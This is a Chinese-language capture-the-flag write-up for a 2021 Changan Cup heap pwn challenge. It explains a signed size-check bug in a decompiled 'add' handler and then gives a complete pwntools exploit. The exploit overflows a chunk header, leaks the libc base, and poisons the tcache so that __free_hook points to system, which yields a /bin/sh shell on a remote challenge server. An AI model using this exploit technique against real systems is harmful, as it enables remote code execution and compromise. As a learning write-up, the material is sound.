2021长安杯-pwn

高质量比赛,下辈子再来(

非常的皮啊。4道pwn2道0解1道一解,还有道就是这个baigei的36解。。。

这次pwn有repwn,webpwn太难受了,转生吧笑死直接变全栈

看题,看题

漏洞在 add 中:idx 只检查了是否大于 0xF,并没有检查该序号是否已经在使用,所以可以对同一序号重复 add;而且 size 在做 `> 1024` 检查之前就已经写进了 size 数组,并且这个比较是有符号的。于是先正常申请一个堆块,再对同一序号 add 一次并把 size 填成 -1 之类的负数:检查通过,malloc(-1) 失败返回 "error!"(不会再问 content),但 size 数组里该序号的大小已经变成 0xffffffffffffffff,而指针仍然指向原来的堆块,之后 edit 就可以按这个"无限大"的长度写入,造成堆溢出。

add

// Decompiled "add" handler (menu option 1) of the challenge binary, as
// recovered by the decompiler.  Globals used:
//   qword_202060[16] - per-slot recorded size (presumably consulted by the
//                      edit handler, which is not shown here)
//   unk_2020E0[16]   - per-slot chunk pointer
// sub_9A9() reads an integer from the user (its body is not shown here).
int sub_A04()
{
  unsigned int v1; // [rsp+0h] [rbp-10h]  slot index
  int nbytes; // [rsp+4h] [rbp-Ch]  requested size (signed)
  void *nbytes_4; // [rsp+8h] [rbp-8h]  freshly allocated chunk

  puts("idx?");
  v1 = sub_9A9();
  // Only the upper bound is checked; a slot that is already in use is
  // accepted, so the same index can be "added" twice.
  if ( v1 > 0xF )
    return puts("error!");
  puts("size?");
  nbytes = sub_9A9();
  // BUG: the size is recorded in the slot table BEFORE it is validated, and
  // the comparison is signed: a negative value such as -1 passes `> 1024`
  // and is stored sign-extended as a huge 64-bit size.
  qword_202060[v1] = nbytes;
  if ( nbytes > 1024 )
    return puts("error!");
  // malloc(-1) fails and the handler bails out here, but the slot keeps its
  // old pointer together with the bogus size: a later edit on that slot can
  // write far past the real chunk (heap overflow).
  nbytes_4 = malloc(nbytes);
  if ( !nbytes_4 )
    return puts("error!");
  *((_QWORD *)&unk_2020E0 + v1) = nbytes_4;
  puts("content?");
  // On this (success) path nbytes is within [0, 1024], so the unsigned
  // reinterpretation is bounded by the chunk that was just allocated.
  read(0, *((void **)&unk_2020E0 + v1), (unsigned int)nbytes);
  return puts("success!");
}

exp

from pwn import *
# pwntools globals: verbose I/O logging, and 64-bit packing for p64()/u64().
context(log_level='debug', arch='amd64')

def add(id, size, content):
    """Menu 1: allocate slot `id` with `size` bytes and send `content` into it.

    `content` is sent raw (no trailing newline) because the binary read()s
    up to `size` bytes straight into the chunk.  Uses the module-level
    connection `p`.
    """
    answers = (
        (">>\n", '1'),
        ("idx?\n", str(id)),
        ("size?\n", str(size)),
    )
    for prompt, answer in answers:
        p.sendlineafter(prompt, answer)
    p.sendafter("content?\n", content)
def delete(id):
    """Menu 2: free the chunk held in slot `id` (uses the module-level `p`)."""
    answers = (
        (">>\n", "2"),
        ("idx?\n", str(id)),
    )
    for prompt, answer in answers:
        p.sendlineafter(prompt, answer)
def edit(id, size, content):
    """Menu 3: write `size` bytes of `content` into slot `id`.

    The content is sent without a newline, exactly as the binary reads it.
    Uses the module-level connection `p`.
    """
    answers = (
        (">>\n", "3"),
        ("idx?\n", str(id)),
        ("size?\n", str(size)),
    )
    for prompt, answer in answers:
        p.sendlineafter(prompt, answer)
    p.sendafter("content?\n", content)
def show(id):
    """Menu 4: make the binary print slot `id`; the caller reads the output from `p`."""
    answers = (
        (">>\n", "4"),
        ("idx?\n", str(id)),
    )
    for prompt, answer in answers:
        p.sendlineafter(prompt, answer)


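# Exploit driver (Python 2 script: print statements, .next()).
#
# Target selection.  The original created a local process and then immediately
# replaced it with the remote connection, leaving ./main running for nothing.
# `python exp.py LOCAL` now runs the local binary; the default keeps the
# original remote target.
if args.LOCAL:
    p = process("./main")
else:
    p = remote("113.201.14.253", 21111)
# Symbol offsets (__free_hook, system) come from this libc; it has to match the
# libc of the target for the addresses computed below to be right.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# ---- stage 1: heap layout --------------------------------------------------
# Every request is 1024 bytes, i.e. 0x410-byte chunks that all share one tcache
# bin.  Assumes glibc 2.27-style tcache (7 entries per bin, no double-free
# key) -- confirm against the target's libc.
for i in range(16):
    add(i, 1024, 'a')
for i in range(1, 8):
    delete(i)          # fill the tcache bin (7 entries)
delete(0)              # tcache full -> chunk 0 goes to the unsorted bin

# Take the 7 tcache chunks back.  tcache is LIFO, so slot 7 now owns the
# memory that used to be slot 1: the chunk directly after chunk 0.
for i in range(1, 8):
    add(i, 1024, 'b')
for i in range(1, 6):
    delete(i)
delete(8)
delete(9)              # tcache bin is full again (5 + 2)

# ---- stage 2: trigger the bug ----------------------------------------------
# add() records the size before validating it; -1 passes the signed `> 1024`
# check, malloc(-1) fails and the handler prints "error!" without asking for
# content -- which is why add() is not used here.  Slot 7 keeps its pointer
# but its recorded size is now 0xffffffffffffffff.
p.sendlineafter(">>\n", '1')
p.sendlineafter("idx?\n", str(7))
p.sendlineafter("size?\n", str(-1))

# Overflow from slot 7 into the header of the following chunk (slot 6): set
# its prev_size to 0x820 (two 0x410 chunks back = chunk 0) and clear its
# PREV_INUSE bit by rewriting the low byte of its size (0x411 -> 0x410).
payload = 'a' * 0x400 + p64(0x820) + '\x10'
edit(7, len(payload), payload)
# The tcache bin is full, so this free takes the regular path: backward
# consolidation with chunk 0 (already in the unsorted bin) produces one big
# free chunk that overlaps slot 7's still-live pointer.
delete(6)

# ---- stage 3: leak libc ----------------------------------------------------
for i in range(7):
    add(i, 1024, 'a')  # drain the tcache so the next requests are served from unsorted
add(9, 1024, 'a')      # carved from the big chunk; the remainder starts at slot 7's memory
add(8, 1024, '\xa0')   # carved from that remainder: slot 8 now aliases slot 7
                       # (its 1-byte content is overwritten by the next edit)
edit(7, 8, 'a' * 8)    # marker so the leak can be located in the output
show(7)
p.recvuntil('a' * 8)
# The 8 bytes after the marker are a stale free-list link left in the chunk,
# expected to point into libc's main_arena.
leak_addr = u64(p.recv(6).ljust(8, '\x00'))
print "leak_addr:", hex(leak_addr)
# 0x7f41502f7190 - 0x7f414ff0b000 == 0x3ec190: distance of the leaked pointer
# from the libc base, measured on the author's libc.
libc_base = leak_addr - (0x7f41502f7190 - 0x7f414ff0b000)
print "libc_base:", hex(libc_base)

free_hook = libc_base + libc.sym['__free_hook']
print "free_hook:", free_hook
system = libc_base + libc.sym['system']

# ---- stage 4: tcache poisoning through the aliased slots -------------------
delete(7)                          # slot 7's chunk enters the (empty) tcache bin
edit(8, 8, p64(free_hook))         # same memory via slot 8: overwrite its tcache `next`
add(7, 1024, '/bin/sh\x00\x00')    # first malloc returns that chunk again ...
add(6, 1024, p64(system))          # ... the second returns __free_hook; write system there

#gdb.attach(p)
#raw_input()
delete(7)                          # free("/bin/sh") -> __free_hook -> system("/bin/sh")

p.interactive()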